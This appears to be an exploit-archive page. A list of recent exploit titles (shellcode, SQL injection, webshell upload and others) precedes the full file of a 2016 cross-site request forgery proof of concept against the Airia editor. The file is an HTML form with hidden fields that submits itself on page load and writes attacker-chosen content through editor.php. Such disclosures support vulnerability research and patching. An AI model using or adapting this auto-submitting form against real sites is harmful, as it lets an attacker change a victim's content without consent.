
11 new exploits Linux Kernel 2.2. / 2.4.x - /proc Filesystem Potential Information Disclosure Vulnerability Linux Kernel 2.2.x / 2.4.x - /proc Filesystem Potential Information Disclosure Vulnerability WordPress Ultimate Product Catalog Plugin 3.8.1 - Privilege Escalation Linux x86_64 execve Shellcode - 15 bytes sNews CMS 1.7.1 - Multiple Vulnerabilities Joomla BT Media (com_bt_media) Component - SQL Injection Premium SEO Pack 1.9.1.3 - wp_options Overwrite Windows XP - 10 - Download & Execute Shellcode Tomabo MP4 Player 3.11.6 - SEH Based Stack Overflow (msf) Airia - (Add Content) CSRF Airia - Webshell Upload Exploit Symphony CMS 2.6.7 - Session Fixation ACROS Security 0patch 2016.05.19.539 - (0PatchServicex64.exe) Unquoted Service Path Privilege Escalation
22 lines
783 B
HTML
Executable file
22 lines
783 B
HTML
Executable file
<!--
|
|
# Exploit Title: Airia - CSRF Vulnerability(Add content)
|
|
# Date: 2016-06-20
|
|
# Exploit Author: HaHwul
|
|
# Exploit Author Blog: www.hahwul.com
|
|
# Vendor Homepage: http://ytyng.com
|
|
# Software Link: https://github.com/ytyng/airia/archive/master.zip
|
|
# Version: Latest commit
|
|
# Tested on: Debian [wheezy]
|
|
-->
|
|
|
|
<form name="csrf_poc" action="http://127.0.0.1/vul_test/airia/editor.php" method="POST">
|
|
<input type="hidden" name="mode" value="save">
|
|
<input type="hidden" name="file" value="1">
|
|
<input type="hidden" name="scrollvalue" value="">
|
|
<input type="hidden" name="contents" value="CSRF Attack">
|
|
<input type="hidden" name="group" value="1">
|
|
|
|
<input type="submit" value="Replay!">
|
|
</form>
|
|
<script type="text/javascript">document.forms.csrf_poc.submit();</script>
|
|
|